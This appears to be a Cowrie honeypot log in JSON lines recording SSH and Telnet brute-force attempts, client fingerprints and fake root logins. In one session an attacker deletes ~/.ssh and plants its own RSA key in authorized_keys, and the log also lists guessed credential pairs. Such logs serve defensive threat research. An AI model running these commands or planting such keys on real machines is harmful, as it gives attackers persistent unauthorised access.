{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T06:12:36.642260Z","src_ip":"212.227.235.229","session":"3c37aee337f3"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:12:37.889505Z","src_ip":"212.227.235.229","session":"3c37aee337f3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49968,"dst_ip":"1.2.3.4","dst_port":22,"session":"04ca59606e5c","protocol":"ssh","message":"New connection: 212.227.235.229:49968 (1.2.3.4:22) [session: 04ca59606e5c]","sensor":"my-vps","timestamp":"2025-09-09T06:12:38.123365Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T06:12:38.124260Z","src_ip":"212.227.235.229","session":"04ca59606e5c"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T06:12:38.362204Z","src_ip":"212.227.235.229","session":"04ca59606e5c"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:12:39.354903Z","src_ip":"212.227.235.229","session":"04ca59606e5c"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:12:39.596283Z","src_ip":"212.227.235.229","session":"04ca59606e5c"}
{"eventid":"cowrie.session.closed","duration":"7.3","message":"Connection lost after 7.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:12:39.599189Z","src_ip":"212.227.235.229","session":"05a837ee46ec"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42219,"dst_ip":"1.2.3.4","dst_port":22,"session":"e7d9956396b2","protocol":"ssh","message":"New connection: 212.227.235.229:42219 (1.2.3.4:22) [session: e7d9956396b2]","sensor":"my-vps","timestamp":"2025-09-09T06:12:55.935391Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:12:55.936216Z","src_ip":"212.227.235.229","session":"e7d9956396b2"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:12:56.023348Z","src_ip":"212.227.235.229","session":"e7d9956396b2"}
{"eventid":"cowrie.login.failed","username":"white","password":"white.123","message":"login attempt [white/white.123] failed","sensor":"my-vps","timestamp":"2025-09-09T06:12:56.409939Z","src_ip":"212.227.235.229","session":"e7d9956396b2"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:12:57.498484Z","src_ip":"212.227.235.229","session":"e7d9956396b2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37922,"dst_ip":"1.2.3.4","dst_port":22,"session":"abf94e06ee28","protocol":"ssh","message":"New connection: 212.227.235.229:37922 (1.2.3.4:22) [session: abf94e06ee28]","sensor":"my-vps","timestamp":"2025-09-09T06:13:18.039937Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T06:13:18.040769Z","src_ip":"212.227.235.229","session":"abf94e06ee28"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T06:13:18.217804Z","src_ip":"212.227.235.229","session":"abf94e06ee28"}
{"eventid":"cowrie.login.failed","username":"adam","password":"1234","message":"login attempt [adam/1234] failed","sensor":"my-vps","timestamp":"2025-09-09T06:13:18.958332Z","src_ip":"212.227.235.229","session":"abf94e06ee28"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:13:20.139196Z","src_ip":"212.227.235.229","session":"abf94e06ee28"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33255,"dst_ip":"1.2.3.4","dst_port":23,"session":"5a88a2773a47","protocol":"telnet","message":"New connection: 212.227.125.160:33255 (1.2.3.4:23) [session: 5a88a2773a47]","sensor":"my-vps","timestamp":"2025-09-09T06:13:32.371057Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45674,"dst_ip":"1.2.3.4","dst_port":22,"session":"5b20aa20510e","protocol":"ssh","message":"New connection: 212.227.235.229:45674 (1.2.3.4:22) [session: 5b20aa20510e]","sensor":"my-vps","timestamp":"2025-09-09T06:14:01.173447Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T06:14:01.175251Z","src_ip":"212.227.235.229","session":"5b20aa20510e"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T06:14:01.417072Z","src_ip":"212.227.235.229","session":"5b20aa20510e"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"11223344","message":"login attempt [ubuntu/11223344] failed","sensor":"my-vps","timestamp":"2025-09-09T06:14:02.425921Z","src_ip":"212.227.235.229","session":"5b20aa20510e"}
{"eventid":"cowrie.session.closed","duration":31.155055284500122,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:14:03.526051Z","src_ip":"212.227.125.160","session":"5a88a2773a47"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:14:03.670515Z","src_ip":"212.227.235.229","session":"5b20aa20510e"}
{"eventid":"cowrie.session.connect","src_ip":"92.118.39.62","src_port":49046,"dst_ip":"1.2.3.4","dst_port":22,"session":"a1fc5947639d","protocol":"ssh","message":"New connection: 92.118.39.62:49046 (1.2.3.4:22) [session: a1fc5947639d]","sensor":"my-vps","timestamp":"2025-09-09T06:14:30.230891Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T06:14:30.231856Z","src_ip":"92.118.39.62","session":"a1fc5947639d"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-09-09T06:14:30.262090Z","src_ip":"92.118.39.62","session":"a1fc5947639d"}
{"eventid":"cowrie.login.failed","username":"blockchain","password":"blockchain","message":"login attempt [blockchain/blockchain] failed","sensor":"my-vps","timestamp":"2025-09-09T06:14:30.353907Z","src_ip":"92.118.39.62","session":"a1fc5947639d"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:14:31.385975Z","src_ip":"92.118.39.62","session":"a1fc5947639d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60992,"dst_ip":"1.2.3.4","dst_port":22,"session":"cfa59d47aeb2","protocol":"ssh","message":"New connection: 212.227.235.229:60992 (1.2.3.4:22) [session: cfa59d47aeb2]","sensor":"my-vps","timestamp":"2025-09-09T06:14:35.656132Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T06:14:35.657053Z","src_ip":"212.227.235.229","session":"cfa59d47aeb2"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T06:14:35.839495Z","src_ip":"212.227.235.229","session":"cfa59d47aeb2"}
{"eventid":"cowrie.login.failed","username":"test","password":"Test@123","message":"login attempt [test/Test@123] failed","sensor":"my-vps","timestamp":"2025-09-09T06:14:36.594119Z","src_ip":"212.227.235.229","session":"cfa59d47aeb2"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:14:37.778802Z","src_ip":"212.227.235.229","session":"cfa59d47aeb2"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":56900,"dst_ip":"1.2.3.4","dst_port":22,"session":"4fa264215c2c","protocol":"ssh","message":"New connection: 217.72.205.35:56900 (1.2.3.4:22) [session: 4fa264215c2c]","sensor":"my-vps","timestamp":"2025-09-09T06:14:38.417431Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:14:38.418762Z","src_ip":"217.72.205.35","session":"4fa264215c2c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56974,"dst_ip":"1.2.3.4","dst_port":23,"session":"75458e09c823","protocol":"telnet","message":"New connection: 212.227.235.229:56974 (1.2.3.4:23) [session: 75458e09c823]","sensor":"my-vps","timestamp":"2025-09-09T06:14:41.192807Z"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:14:41.401855Z","src_ip":"212.227.235.229","session":"75458e09c823"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:14:41.421427Z","src_ip":"212.227.235.229","session":"75458e09c823"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55129,"dst_ip":"1.2.3.4","dst_port":22,"session":"3f7a7ba922cf","protocol":"ssh","message":"New connection: 212.227.235.229:55129 (1.2.3.4:22) [session: 3f7a7ba922cf]","sensor":"my-vps","timestamp":"2025-09-09T06:15:00.174379Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:15:00.175533Z","src_ip":"212.227.235.229","session":"3f7a7ba922cf"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:15:00.262975Z","src_ip":"212.227.235.229","session":"3f7a7ba922cf"}
{"eventid":"cowrie.login.success","username":"root","password":"josejose","message":"login attempt [root/josejose] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:15:00.655756Z","src_ip":"212.227.235.229","session":"3f7a7ba922cf"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:15:00.894004Z","src_ip":"212.227.235.229","session":"3f7a7ba922cf"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:15:00.894879Z","src_ip":"212.227.235.229","session":"3f7a7ba922cf"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:15:00.895998Z","src_ip":"212.227.235.229","session":"3f7a7ba922cf"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:15:00.984688Z","src_ip":"212.227.235.229","session":"3f7a7ba922cf"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:15:01.247232Z","src_ip":"212.227.235.229","session":"3f7a7ba922cf"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T06:15:01.248413Z","src_ip":"212.227.235.229","session":"3f7a7ba922cf"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T06:15:01.338603Z","src_ip":"212.227.235.229","session":"3f7a7ba922cf"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:15:01.339805Z","src_ip":"212.227.235.229","session":"3f7a7ba922cf"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55291,"dst_ip":"1.2.3.4","dst_port":22,"session":"4434877ee606","protocol":"ssh","message":"New connection: 212.227.235.229:55291 (1.2.3.4:22) [session: 4434877ee606]","sensor":"my-vps","timestamp":"2025-09-09T06:15:01.385197Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:15:01.386211Z","src_ip":"212.227.235.229","session":"4434877ee606"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:15:01.453930Z","src_ip":"212.227.235.229","session":"4434877ee606"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T06:15:01.765036Z","src_ip":"212.227.235.229","session":"4434877ee606"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:15:02.834711Z","src_ip":"212.227.235.229","session":"4434877ee606"}
